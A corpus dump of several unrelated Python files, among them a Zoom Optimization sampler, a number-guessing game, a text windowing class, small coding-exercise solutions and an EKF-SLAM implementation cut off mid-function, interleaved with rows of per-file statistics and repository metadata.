optimum.to_csv(self.config.results_dir / "optima.csv", index=False)
return self.config.experiment_batch_path, batch_original_space
def evaluate_optimum(dataset: Dataset) -> pd.DataFrame:
"""
Return the optimum as inferred by the Zoom Opt. algorithm. The inferred optimum is taken as the location
of the observed sample with highest observed objective.
Args:
dataset (dataset.Dataset): Dataset with the data observed so-far.
Returns:
pd.DataFrame: A DataFrame with a single row: the inputs at the inferred optimum
"""
# Get the index of data point with highest observed objective
optimum_idx = dataset.pretransform_df[dataset.pretransform_output_name].argmax()
# Get the inputs of the data point with highest observed objective
optimum_loc = dataset.pretransform_df[dataset.pretransform_input_names].iloc[[optimum_idx]]
return optimum_loc
def _suggest_samples(dataset: Dataset, settings: ZoomOptSettings) -> np.ndarray:
"""Suggests a new batch of samples.
Currently this method doesn't allow categorical inputs.
Returns:
a batch of suggestions. Shape (batch_size, n_inputs).
Raises:
ValueError, if batch size is less than 1
NotImplementedError, if any categorical inputs are present
"""
if settings.batch < 1:
raise ValueError(f"Use batch size at least 1. (Was {settings.batch}).") # pragma: no cover
continuous_dict, categorical_dict = dataset.parameter_space
# If any categorical variable is present, we raise an exception. In theory they should be represented by one-hot
# encodings, but I'm not sure how to retrieve the bounds of this space and do optimization within it (the
# best way is probably to optimize it in an unconstrained space and map it to one-hot vectors using softmax).
# Moreover, in BayesOpt there is iteration over contexts.
if categorical_dict:
raise NotImplementedError("This method doesn't work with categorical inputs right now.") # pragma: no cover
# It seems that continuous_dict.values() contains pandas series instead of tuples, so we need to map over it
# to retrieve the parameter space
original_space: Hypercuboid = [(a, b) for a, b in continuous_dict.values()]
# Find the location of the optimum. We will shrink the space around it
optimum: np.ndarray = _get_optimum_location(dataset)
# Estimate how many optimization iterations were performed.
step_number: int = settings.n_step or _estimate_step_number(
n_points=len(dataset.output_array), batch_size=settings.batch
)
# Convert to per-batch shrinking factor if a per-iteration shrinking factor supplied
per_batch_shrinking_factor = (
settings.shrinking_factor ** settings.batch if settings.shrink_per_iter else settings.shrinking_factor
)
# Calculate by what factor each dimension of the hypercube should be shrunk
shrinking_factor_per_dim: float = _calculate_shrinking_factor(
initial_shrinking_factor=per_batch_shrinking_factor, step_number=step_number, n_dim=len(original_space)
)
# Shrink the space
new_space: Hypercuboid = [
shrink_interval(
shrinking_factor=shrinking_factor_per_dim, interval=interval, shrinking_anchor=optimum_coordinate
)
for interval, optimum_coordinate in zip(original_space, optimum)
]
# The shrunk space may be out of the original bounds (e.g. if the maximum was close to the boundary).
# Translate it.
new_space = _move_to_original_bounds(new_space=new_space, original_space=original_space)
# Sample the new space to get a batch of new suggestions.
parameter_space = ParameterSpace([ContinuousParameter(f"x{i}", low, upp) for i, (low, upp) in enumerate(new_space)])
return designs.suggest_samples(
parameter_space=parameter_space, design_type=settings.design, point_count=settings.batch
)
def _estimate_step_number(n_points: int, batch_size: int) -> int:
"""Estimates which step this is (or rather how many steps were collected previously, basing on the ratio
of number of points collected and the batch size).
Note that this method is provisional and may be replaced with a parameter in the config.
Raises:
ValueError if ``n_points`` or ``batch_size`` is less than 1
"""
if min(n_points, batch_size) < 1:
raise ValueError(
f"Both n_points={n_points} and batch_size={batch_size} must be at least 1."
) # pragma: no cover
return n_points // batch_size
def _calculate_shrinking_factor(initial_shrinking_factor: float, step_number: int, n_dim: int) -> float:
"""The length of each in interval bounding the parameter space needs to be multiplied by this number.
Args:
initial_shrinking_factor: in each step the total volume is shrunk by this amount
step_number: optimization step -- if we collected only an initial batch, this step is 1
n_dim: number of dimensions
Example:
Assume that ``initial_shrinking_factor=0.5`` and ``step_number=1``. This means that the total volume should
be multiplied by :math:`1/2`. Hence, if there are :math:`N` dimensions (``n_dim``), the length of each
bounding interval should be multiplied by :math:`1/2^{1/N}`.
However, if ``step_number=3``, each dimension should be shrunk three times, i.e. we need to multiply it by
:math:`1/2^{3/N}`.
Returns:
the shrinking factor for each dimension
"""
assert 0 < initial_shrinking_factor < 1, (
f"Shrinking factor must be between 0 and 1. " f"(Was {initial_shrinking_factor})."
)
assert step_number >= 1 and n_dim >= 1, (
f"Step number and number of dimensions must be greater than 0. "
f"(Where step_number={step_number}, n_dim={n_dim})."
)
return initial_shrinking_factor ** (step_number / n_dim)
def _get_optimum_location(dataset: Dataset) -> np.ndarray:
"""Returns the position (in the transformed space) of the maximum. Shape (n_inputs,)."""
# Retrieve the observations
X, Y = dataset.inputs_array, dataset.output_array
# Return the location of the maximum
best_index = int(np.argmax(Y))
return X[best_index, :]
def shrink_interval(shrinking_factor: float, interval: Interval, shrinking_anchor: float) -> Interval:
"""Shrinks a one-dimensional interval around the ``shrinking_anchor``. The new interval
is centered around the optimum.
Note:
the shrunk interval may not be contained in the initial one. (E.g. if the shrinking anchor is near the
boundary).
Args:
shrinking_factor: by this amount the length interval is multiplied. Expected to be between 0 and 1
interval: endpoints of the interval
shrinking_anchor: point around which the interval will be shrunk
Returns:
endpoints of the shrunk interval
"""
neighborhood = shrinking_factor * (interval[1] - interval[0])
return shrinking_anchor - neighborhood / 2, shrinking_anchor + neighborhood / 2
def _validate_interval(interval: Interval) -> None:
"""Validates whether an interval is non-empty.
Note:
one-point interval :math:`[a, a]` is allowed
Raises:
ValueError: if the end of the interval is less than its origin
"""
origin, end = interval
if end < origin:
raise ValueError(f"Interval [{origin}, {end}] is not a proper one.") # pragma: no cover
def interval_length(interval: Interval) -> float:
"""Returns interval length."""
_validate_interval(interval)
return interval[1] - interval[0]
def shift_to_within_parameter_bounds(new_interval: Interval, old_interval: Interval) -> Interval:
"""Translates ``new_interval`` to ``old_interval``, without changing its volume.
Raises:
ValueError: if translation is not possible.
"""
if interval_length(new_interval) > interval_length(old_interval):
raise ValueError( # pragma: no cover
f"Translation is not possible. New interval {new_interval} is longer "
f"than the original one {old_interval}."
)
new_min, new_max = new_interval
old_min, old_max = old_interval
if old_min <= new_min and new_max <= old_max: # In this case we don't need to translate the interval
return new_interval
else:
if new_min < old_min: # Figure out the direction of the translation
translation = old_min - new_min
else:
translation = old_max - new_max
return new_min + translation, new_max + translation
def _move_to_original_bounds(new_space: Hypercuboid, original_space: Hypercuboid) -> Hypercuboid:
"""Translates ``new_space`` to be a subset of the ``original_space``, without affecting its volume."""
moved_bounds: Hypercuboid = []
for new_interval, old_interval in zip(new_space, original_space):
moved_bounds.append(shift_to_within_parameter_bounds(new_interval=new_interval, old_interval=old_interval))
return moved_bounds
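A worked example of the shrinking arithmetic above, using the module's own helpers with illustrative numbers: with shrinking factor 0.5 at step 3 in 2 dimensions, each interval is scaled by 0.5 ** (3 / 2), and an interval shrunk around an anchor near the boundary is translated back inside the bounds.

factor = _calculate_shrinking_factor(
    initial_shrinking_factor=0.5, step_number=3, n_dim=2
)  # 0.5 ** 1.5 ~= 0.3536
new_interval = shrink_interval(factor, interval=(0.0, 10.0), shrinking_anchor=9.5)
print(new_interval)  # ~(7.73, 11.27): spills past the upper bound of 10
print(shift_to_within_parameter_bounds(new_interval, (0.0, 10.0)))  # ~(6.46, 10.0)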
| 41.106452
| 120
| 0.697167
| 1,753
| 12,743
| 4.928694
| 0.225328
| 0.041667
| 0.017824
| 0.005208
| 0.101157
| 0.067824
| 0.042824
| 0.017593
| 0.008796
| 0
| 0
| 0.004593
| 0.214078
| 12,743
| 309
| 121
| 41.239482
| 0.858113
| 0.502943
| 0
| 0.037037
| 0
| 0
| 0.101893
| 0.013011
| 0
| 0
| 0
| 0
| 0.027778
| 1
| 0.101852
| false
| 0
| 0.083333
| 0
| 0.305556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5a44f9a6a387924ac0536e279f50da03dd8ba3f
| 1,146
|
py
|
Python
|
Labs/lab4/l4e3.py
|
felixchiasson/ITI1520
|
4208904bf7576433313524ebd1c1bdb9f49277f2
|
[
"MIT"
] | null | null | null |
Labs/lab4/l4e3.py
|
felixchiasson/ITI1520
|
4208904bf7576433313524ebd1c1bdb9f49277f2
|
[
"MIT"
] | null | null | null |
Labs/lab4/l4e3.py
|
felixchiasson/ITI1520
|
4208904bf7576433313524ebd1c1bdb9f49277f2
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python3
###############################################################################
# File Name : l4e3.py
# Created By    : Félix Chiasson (7138723)
# Creation Date : [2015-10-06 11:43]
# Last Modified : [2015-10-06 11:56]
# Description : Asks user to guess randomly generated number
###############################################################################
from random import randint
def devine(r):  # takes the target number as a parameter instead of relying on the global
    correct = False
    essai = 0
    print("Let's play a game! Devinez un nombre entre 1 et 10.")
    while not correct:
        reponse = int(input("Quel est le nombre? "))
        if reponse == r:
            essai = essai + 1
            print("Bravo! Vous avez réussi après", essai, "essai(s)")
            correct = True
        elif 1 <= reponse <= 10:
            if reponse > r:
                print("Plus bas!")
            else:
                print("Plus haut!")
            essai = essai + 1
        else:
            print("Veuillez entrer un chiffre entre 1 et 10!")
r = randint(1, 10)
devine(r)
| 35.8125
| 79
| 0.447644
| 123
| 1,146
| 4.170732
| 0.634146
| 0.062378
| 0.05848
| 0.087719
| 0.074074
| 0
| 0
| 0
| 0
| 0
| 0
| 0.062176
| 0.326353
| 1,146
| 31
| 80
| 36.967742
| 0.602332
| 0.251309
| 0
| 0
| 0
| 0
| 0.242775
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.05
| 0
| 0.1
| 0.25
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5a4a070bcfd5efb385e2904922ea624312e4682
| 2,984
|
py
|
Python
|
python/datamongo/text/dmo/text_query_windower.py
|
jiportilla/ontology
|
8a66bb7f76f805c64fc76cfc40ab7dfbc1146f40
|
[
"MIT"
] | null | null | null |
python/datamongo/text/dmo/text_query_windower.py
|
jiportilla/ontology
|
8a66bb7f76f805c64fc76cfc40ab7dfbc1146f40
|
[
"MIT"
] | null | null | null |
python/datamongo/text/dmo/text_query_windower.py
|
jiportilla/ontology
|
8a66bb7f76f805c64fc76cfc40ab7dfbc1146f40
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import string
import pandas as pd
from pandas import DataFrame
from base import BaseObject
class TextQueryWindower(BaseObject):
""" Window Text Query Results
"""
__exclude = set(string.punctuation)
def __init__(self,
query_results: dict,
is_debug: bool = False):
"""
Created:
craig.trim@ibm.com
16-Oct-2019
* https://github.ibm.com/GTS-CDO/unstructured-analytics/issues/1122#issuecomment-15340437
        :param query_results:
            the text query results, keyed by case number
:param is_debug:
"""
BaseObject.__init__(self, __name__)
self._is_debug = is_debug
self._query_results = query_results
def _to_text(self):
"""
Purpose:
Transform Query results into pure text
:return:
return a list of text results only
"""
values = set()
for cnum in self._query_results:
[values.add(d['value']) for d in self._query_results[cnum]]
return sorted(values)
def _tokens(self,
term: str,
input_text: str) -> list:
input_text = input_text.lower().replace('\t', ' ')
input_text = ''.join(ch for ch in input_text if ch not in self.__exclude)
tokens = input_text.split(' ')
tokens = [x.strip() for x in tokens if x and len(x.strip())]
tokens = [x.lower() for x in tokens]
if ' ' not in term: # return unigrams
return tokens
if term.count(' ') == 1: # return bigrams
s = set()
for i in range(0, len(tokens)):
if i + 1 < len(tokens):
s.add(f"{tokens[i]} {tokens[i + 1]}")
return sorted(s)
raise NotImplementedError
def process(self,
term: str,
window_size: int = 5) -> DataFrame:
"""
:param term:
:param window_size:
:return:
"""
master = []
term = term.lower().strip()
for input_text in self._to_text():
tokens = self._tokens(term, input_text)
            if term not in tokens:
                continue  # term absent from this text; tokens.index would raise ValueError
            n = tokens.index(term)
def pos_x():
if n - window_size >= 0:
return n - window_size
return 0
def pos_y():
if n + window_size < len(tokens):
return n + window_size
return len(tokens)
x = pos_x()
y = pos_y()
def l_context():
return ' '.join(tokens[x:n]).strip()
def r_context():
return ' '.join(tokens[n + 1:y]).strip()
master.append({
"A": l_context(),
"B": tokens[n],
"C": r_context()})
return pd.DataFrame(master).sort_values(
by=['A'], ascending=False)
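A usage sketch under assumed inputs: query_results maps a key (e.g. a case number) to a list of dicts with a 'value' field, which is what _to_text() reads. This also assumes the repo's base.BaseObject is importable.

results = {"c1": [{"value": "the quick brown fox jumps over the lazy dog"}]}
windower = TextQueryWindower(query_results=results)
df = windower.process(term="fox", window_size=2)
print(df)  # column A: left context, B: the matched term, C: right context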
| 25.947826
| 103
| 0.499665
| 338
| 2,984
| 4.233728
| 0.349112
| 0.050314
| 0.044724
| 0.025157
| 0.051712
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014811
| 0.389075
| 2,984
| 114
| 104
| 26.175439
| 0.770159
| 0.154826
| 0
| 0.032258
| 0
| 0
| 0.018692
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.129032
| false
| 0
| 0.064516
| 0.032258
| 0.387097
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5a553d43dc2a036ccb015ad21d1dcf2af2ae50c
| 640
|
py
|
Python
|
hackerrank/interview_prep/making_anagrams.py
|
luojxxx/CodingPractice
|
bac357aaddbda8e6e73a49c36f2eefd4304b336d
|
[
"MIT"
] | null | null | null |
hackerrank/interview_prep/making_anagrams.py
|
luojxxx/CodingPractice
|
bac357aaddbda8e6e73a49c36f2eefd4304b336d
|
[
"MIT"
] | null | null | null |
hackerrank/interview_prep/making_anagrams.py
|
luojxxx/CodingPractice
|
bac357aaddbda8e6e73a49c36f2eefd4304b336d
|
[
"MIT"
] | null | null | null |
# https://www.hackerrank.com/challenges/ctci-making-anagrams
from collections import Counter
def number_needed(a, b):
aCounts = Counter(a)
bCounts = Counter(b)
aSet = set(aCounts)
bSet = set(bCounts)
similar = aSet.intersection(bSet)
differences = aSet.symmetric_difference(bSet)
matchingKeysDiff = sum([ abs(aCounts[key] - bCounts[key]) for key in similar ])
differentKeysDiff = 0
for key in differences:
if key in aCounts:
differentKeysDiff += aCounts[key]
if key in bCounts:
differentKeysDiff += bCounts[key]
return matchingKeysDiff + differentKeysDiff
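An equivalent, more compact formulation (a sketch, not the submitted solution): Counter subtraction keeps only positive multiplicities, so summing both directions counts every character that must be deleted from either string.

from collections import Counter

def number_needed_compact(a, b):
    ca, cb = Counter(a), Counter(b)
    return sum((ca - cb).values()) + sum((cb - ca).values())

assert number_needed_compact("cde", "abc") == 4  # delete d, e from one and a, b from the other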
| 29.090909
| 83
| 0.678125
| 72
| 640
| 6
| 0.513889
| 0.046296
| 0.037037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002028
| 0.229688
| 640
| 22
| 84
| 29.090909
| 0.874239
| 0.090625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0
| 0.0625
| 0
| 0.1875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5a5adab4d37dc9f239bb54f261403d5485bdb40
| 803
|
py
|
Python
|
DongbinNa/19/pt4.py
|
wonnerky/coteMaster
|
360e491e6342c1ee42ff49750b838a2ead865613
|
[
"Apache-2.0"
] | null | null | null |
DongbinNa/19/pt4.py
|
wonnerky/coteMaster
|
360e491e6342c1ee42ff49750b838a2ead865613
|
[
"Apache-2.0"
] | null | null | null |
DongbinNa/19/pt4.py
|
wonnerky/coteMaster
|
360e491e6342c1ee42ff49750b838a2ead865613
|
[
"Apache-2.0"
] | null | null | null |
n = int(input())
numbers = list(map(int, input().split()))
add, sub, mul, div = map(int, input().split())
def dfs(now, i):  # now: running value, i: index of the next number to consume
global max_num, min_num, add, sub, mul, div
if i == n:
max_num = max(max_num, now)
min_num = min(min_num, now)
else:
if add > 0:
add -= 1
dfs(now + numbers[i], i + 1)
add += 1
if sub > 0:
sub -= 1
dfs(now - numbers[i], i + 1)
sub += 1
if mul > 0:
mul -= 1
dfs(now * numbers[i], i + 1)
mul += 1
if div > 0:
div -= 1
dfs(int(now / numbers[i]), i + 1)
div += 1
min_num = 1e9
max_num = -1e9
dfs(numbers[0], 1)
print(max_num)
print(min_num)
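A brute-force cross-check of the DFS (a standalone sketch with a small illustrative input): with numbers [1, 2, 3] and one '+' and one '-', the reachable values are 1 + 2 - 3 = 0 and 1 - 2 + 3 = 2.

from itertools import permutations

numbers = [1, 2, 3]
ops = ['+', '-']  # one addition and one subtraction available
results = set()
for perm in set(permutations(ops)):
    acc = numbers[0]
    for op, x in zip(perm, numbers[1:]):
        acc = acc + x if op == '+' else acc - x
    results.add(acc)
print(max(results), min(results))  # 2 0 -- matches the DFS output for this input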
| 22.305556
| 48
| 0.414695
| 115
| 803
| 2.808696
| 0.217391
| 0.092879
| 0.136223
| 0.148607
| 0.198142
| 0.157895
| 0.157895
| 0
| 0
| 0
| 0
| 0.049107
| 0.442092
| 803
| 35
| 49
| 22.942857
| 0.671875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033333
| false
| 0
| 0
| 0
| 0.033333
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5a81b703f6ebb1da895acb3224ef4edc9e40b99
| 19,141
|
py
|
Python
|
Graded/G3/slam/EKFSLAM.py
|
chrstrom/TTK4250
|
f453c3a59597d3fe6cff7d35b790689919798b94
|
[
"Unlicense"
] | null | null | null |
Graded/G3/slam/EKFSLAM.py
|
chrstrom/TTK4250
|
f453c3a59597d3fe6cff7d35b790689919798b94
|
[
"Unlicense"
] | null | null | null |
Graded/G3/slam/EKFSLAM.py
|
chrstrom/TTK4250
|
f453c3a59597d3fe6cff7d35b790689919798b94
|
[
"Unlicense"
] | null | null | null |
from typing import Tuple
import numpy as np
from numpy import ndarray
from dataclasses import dataclass, field
from scipy.linalg import block_diag
import scipy.linalg as la
from utils import rotmat2d
from JCBB import JCBB
import utils
import solution
@dataclass
class EKFSLAM:
Q: ndarray
R: ndarray
do_asso: bool
alphas: 'ndarray[2]' = field(default=np.array([0.001, 0.0001]))
sensor_offset: 'ndarray[2]' = field(default=np.zeros(2))
def f(self, x: np.ndarray, u: np.ndarray) -> np.ndarray:
"""Add the odometry u to the robot state x.
Parameters
----------
x : np.ndarray, shape=(3,)
the robot state
u : np.ndarray, shape=(3,)
the odometry
Returns
-------
np.ndarray, shape = (3,)
the predicted state
"""
psikm1 = x[2]
xk = x[0] + u[0]*np.cos(psikm1) - u[1]*np.sin(psikm1)
yk = x[1] + u[0]*np.sin(psikm1) + u[1]*np.cos(psikm1)
psik = psikm1 + u[2]
xpred = np.array([xk, yk, psik])
return xpred
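    # Worked example (a sketch, not from the original file): with x = [0, 0, 0]
    # and z_odo = [1, 0, np.pi / 2], f() returns [1, 0, np.pi / 2] -- the robot
    # moves 1 m along its current heading and then turns 90 degrees in place.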
def Fx(self, x: np.ndarray, u: np.ndarray) -> np.ndarray:
"""Calculate the Jacobian of f with respect to x.
Parameters
----------
x : np.ndarray, shape=(3,)
the robot state
u : np.ndarray, shape=(3,)
the odometry
Returns
-------
np.ndarray
The Jacobian of f wrt. x.
"""
#Fx = solution.EKFSLAM.EKFSLAM.Fx(self, x, u)
#return Fx
psi = x[2]
Fx = np.array([[1, 0, -u[0]*np.sin(psi) - u[1]*np.cos(psi)],
[0, 1, u[0]*np.cos(psi) - u[1]*np.sin(psi)],
[0, 0, 1]])
return Fx
def Fu(self, x: np.ndarray, u: np.ndarray) -> np.ndarray:
"""Calculate the Jacobian of f with respect to u.
Parameters
----------
x : np.ndarray, shape=(3,)
the robot state
u : np.ndarray, shape=(3,)
the odometry
Returns
-------
np.ndarray
The Jacobian of f wrt. u.
"""
#Fu = solution.EKFSLAM.EKFSLAM.Fu(self, x, u)
#return Fu
psi = x[2]
Fu = np.array([[np.cos(psi), -np.sin(psi), 0],
[np.sin(psi), np.cos(psi), 0],
[0, 0, 1]])
return Fu
def predict(
self, eta: np.ndarray, P: np.ndarray, z_odo: np.ndarray
) -> Tuple[np.ndarray, np.ndarray]:
"""Predict the robot state using the zOdo as odometry the corresponding state&map covariance.
Parameters
----------
eta : np.ndarray, shape=(3 + 2*#landmarks,)
the robot state and map concatenated
P : np.ndarray, shape=(3 + 2*#landmarks,)*2
the covariance of eta
z_odo : np.ndarray, shape=(3,)
the measured odometry
Returns
-------
Tuple[np.ndarray, np.ndarray], shapes= (3 + 2*#landmarks,), (3 + 2*#landmarks,)*2
predicted mean and covariance of eta.
"""
#etapred, P = solution.EKFSLAM.EKFSLAM.predict(self, eta, P, z_odo)
#return etapred, P
        # check input matrices
assert np.allclose(P, P.T), "EKFSLAM.predict: not symmetric P input"
assert np.all(
np.linalg.eigvals(P) >= 0
), "EKFSLAM.predict: non-positive eigen values in P input"
assert (
eta.shape * 2 == P.shape
), "EKFSLAM.predict: input eta and P shape do not match"
etapred = np.empty_like(eta)
x = eta[:3]
etapred[:3] = self.f(x, z_odo)
etapred[3:] = eta[3:]
Fx = self.Fx(x, z_odo)
Fu = self.Fu(x, z_odo)
# evaluate covariance prediction in place to save computation
# only robot state changes, so only rows and colums of robot state needs changing
# cov matrix layout:
# [[P_xx, P_xm],
# [P_mx, P_mm]]
P[:3, :3] = Fx@P[:3, :3]@Fx.T + Fu@self.Q@Fu.T
P[:3, 3:] = Fx@P[:3, 3:]
P[3:, :3] = P[:3, 3:].T
assert np.allclose(P, P.T), "EKFSLAM.predict: not symmetric P"
assert np.all(
np.linalg.eigvals(P) > 0
), "EKFSLAM.predict: non-positive eigen values"
assert (
etapred.shape * 2 == P.shape
), "EKFSLAM.predict: calculated shapes does not match"
return etapred, P
def h(self, eta: np.ndarray) -> np.ndarray:
"""Predict all the landmark positions in sensor frame.
Parameters
----------
eta : np.ndarray, shape=(3 + 2 * #landmarks,)
The robot state and landmarks stacked.
Returns
-------
np.ndarray, shape=(2 * #landmarks,)
The landmarks in the sensor frame.
"""
#zpred = solution.EKFSLAM.EKFSLAM.h(self, eta)
#return zpred
# extract states and map
x = eta[0:3]
# reshape map (2, #landmarks), m[:, j] is the jth landmark
m = eta[3:].reshape((-1, 2)).T
Rot = rotmat2d(-x[2])
# relative position of landmark to sensor on robot in world frame
delta_m = (m.T - eta[0:2]).T
# predicted measurements in cartesian coordinates, beware sensor offset for VP
        zpredcart = Rot @ delta_m - self.sensor_offset[:, None]  # None as index adds an axis with size 1 at that position.
zpred_r = la.norm(zpredcart, 2, axis=0) # ranges
zpred_theta = np.arctan2(zpredcart[1,:], zpredcart[0,:]) # bearings
        zpred = np.vstack((zpred_r, zpred_theta))  # the two arrays stacked on top of each other vertically
# stack measurements along one dimension, [range1 bearing1 range2 bearing2 ...]
zpred = zpred.T.ravel()
assert (
zpred.ndim == 1 and zpred.shape[0] == eta.shape[0] - 3
), "SLAM.h: Wrong shape on zpred"
return zpred
def h_jac(self, eta: np.ndarray) -> np.ndarray:
"""Calculate the jacobian of h.
Parameters
----------
eta : np.ndarray, shape=(3 + 2 * #landmarks,)
The robot state and landmarks stacked.
Returns
-------
np.ndarray, shape=(2 * #landmarks, 3 + 2 * #landmarks)
the jacobian of h wrt. eta.
"""
# H = solution.EKFSLAM.EKFSLAM.h_jac(self, eta)
# return H
# extract states and map
x = eta[0:3]
# reshape map (2, #landmarks), m[j] is the jth landmark
m = eta[3:].reshape((-1, 2)).T
numM = m.shape[1]
Rot = rotmat2d(x[2])
# relative position of landmark to robot in world frame. m - rho that appears in (11.15) and (11.16)
delta_m = (m.T - eta[0:2]).T
        # (2, #measurements), each measured position in cartesian coordinates
zc = delta_m - Rot @ self.sensor_offset[:, None]
zr = la.norm(zc, 2, axis=0) # ranges
Rpihalf = rotmat2d(np.pi / 2)
# In what follows you can be clever and avoid making this for all the landmarks you _know_
# you will not detect (the maximum range should be available from the data).
# But keep it simple to begin with.
# Allocate H and set submatrices as memory views into H
# You may or may not want to do this like this
# see eq (11.15), (11.16), (11.17)
H = np.zeros((2 * numM, 3 + 2 * numM))
Hx = H[:, :3] # slice view, setting elements of Hx will set H as well
Hm = H[:, 3:] # slice view, setting elements of Hm will set H as well
# proposed way is to go through landmarks one by one
# preallocate and update this for some speed gain if looping
jac_z_cb = -np.eye(2, 3)
for i in range(numM): # But this whole loop can be vectorized
ind = 2 * i # starting position of the ith landmark into H
# the inds slice for the ith landmark into H
inds = slice(ind, ind + 2)
jac_z_cb[:,2] = -Rpihalf@delta_m[:,i]
jac_x_range = zc[:,i].T / zr[i]
jac_x_bearing = zc[:,i].T @ Rpihalf.T / zr[i]**2
Hx[ind,:] = jac_x_range @ jac_z_cb
Hx[ind+1,:] = jac_x_bearing @ jac_z_cb
Hm[ind,inds] = jac_x_range
Hm[ind+1,inds] = jac_x_bearing
# You can set some assertions here to make sure that some of the structure in H is correct
# Don't mind if I don't :)
return H
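# --- Illustrative aside (not part of the original file): instead of the structural
# assertions suggested above, one can spot-check h_jac against a central-difference
# Jacobian of h. `slam` is assumed to be a constructed EKFSLAM and `eta` a valid
# state; bearings near +/-pi may wrap and spoil the comparison, so avoid that region.
def _check_h_jac(slam, eta, eps=1e-6):
    H = slam.h_jac(eta)
    H_num = np.zeros_like(H)
    for k in range(eta.size):
        d = np.zeros_like(eta)
        d[k] = eps
        H_num[:, k] = (slam.h(eta + d) - slam.h(eta - d)) / (2 * eps)
    return np.allclose(H, H_num, atol=1e-4)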
def add_landmarks(
self, eta: np.ndarray, P: np.ndarray, z: np.ndarray
) -> Tuple[np.ndarray, np.ndarray]:
"""Calculate new landmarks, their covariances and add them to the state.
Parameters
----------
eta : np.ndarray, shape=(3 + 2*#landmarks,)
the robot state and map concatenated
P : np.ndarray, shape=(3 + 2*#landmarks,)*2
the covariance of eta
z : np.ndarray, shape=(2 * #newlandmarks,)
A set of measurements to create landmarks for
Returns
-------
Tuple[np.ndarray, np.ndarray], shapes=(3 + 2*(#landmarks + #newlandmarks),), (3 + 2*(#landmarks + #newlandmarks),)*2
eta with new landmarks appended, and its covariance
"""
# etaadded, Padded = solution.EKFSLAM.EKFSLAM.add_landmarks(
# self, eta, P, z)
# return etaadded, Padded
n = P.shape[0]
assert z.ndim == 1, "SLAM.add_landmarks: z must be a 1d array"
numLmk = z.shape[0] // 2
lmnew = np.empty_like(z)
Gx = np.empty((numLmk * 2, 3))
Rall = np.zeros((numLmk * 2, numLmk * 2))
I2 = np.eye(2) # Preallocate, used for Gx
Rnb = rotmat2d(eta[2])
sensor_offset_world = Rnb @ self.sensor_offset + eta[:2]
sensor_offset_world_der = rotmat2d(
eta[2] + np.pi / 2) @ self.sensor_offset # Used in Gx
for j in range(numLmk):
ind = 2 * j
inds = slice(ind, ind + 2)
zj = z[inds]
ang = zj[1] + eta[2]
rot = rotmat2d(ang) # rotmat in Gz
# calculate position of new landmark in world frame
lmnew[inds] = Rnb @ (zj[0] * np.array([np.cos(zj[1]), np.sin(zj[1])])) + sensor_offset_world
Gx[inds, :2] = I2
Gx[inds, 2] = zj[0] * np.array([-np.sin(ang), np.cos(ang)]) + sensor_offset_world_der
Gz = rot @ np.diag([1, zj[0]])
# Gz * R * Gz^T, transform measurement covariance from polar to cartesian coordinates
Rall[inds, inds] = Gz @ self.R @ Gz.T
assert len(lmnew) % 2 == 0, "SLAM.add_landmark: lmnew not even length"
etaadded = np.append(eta, lmnew) # append new landmarks to state vector
# block diagonal of P_new, see problem text in 1g) in graded assignment 3
Padded = block_diag(P, Gx@P[:3,:3]@Gx.T + Rall)
Padded[:n, n:] = P[:, :3]@Gx.T # top right corner of Padded
Padded[n:, :n] = Padded[:n, n:].T # bottom left corner of Padded
assert (
etaadded.shape * 2 == Padded.shape
), "EKFSLAM.add_landmarks: calculated eta and P has wrong shape"
assert np.allclose(
Padded, Padded.T
), "EKFSLAM.add_landmarks: Padded not symmetric"
assert np.all(
np.linalg.eigvals(Padded) >= 0
), "EKFSLAM.add_landmarks: Padded not PSD"
return etaadded, Padded
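# --- Illustrative aside (not part of the original file): a Monte-Carlo sanity check
# of the polar-to-cartesian noise transform Gz R Gz^T used above, for a single
# measurement with dummy range/bearing noise (rotmat2d is the module's own helper).
def _demo_polar_to_cartesian_cov():
    rng = np.random.default_rng(1)
    r, b = 10.0, 0.3                      # dummy range and bearing
    R2 = np.diag([0.05**2, 0.01**2])      # stand-in for self.R
    Gz = rotmat2d(b) @ np.diag([1, r])
    s = rng.multivariate_normal([r, b], R2, size=200_000)
    xy = np.column_stack((s[:, 0] * np.cos(s[:, 1]), s[:, 0] * np.sin(s[:, 1])))
    cov_mc = np.cov(xy, rowvar=False)
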